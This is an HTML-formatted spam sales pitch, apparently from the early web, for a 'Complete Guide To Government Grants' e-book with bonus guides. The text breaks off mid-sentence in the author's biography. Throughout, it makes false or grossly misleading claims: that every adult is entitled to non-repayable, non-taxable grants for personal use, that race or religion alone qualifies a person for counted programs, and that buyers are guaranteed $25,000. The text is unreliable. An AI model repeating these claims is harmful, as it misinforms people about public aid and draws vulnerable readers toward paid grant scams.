 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
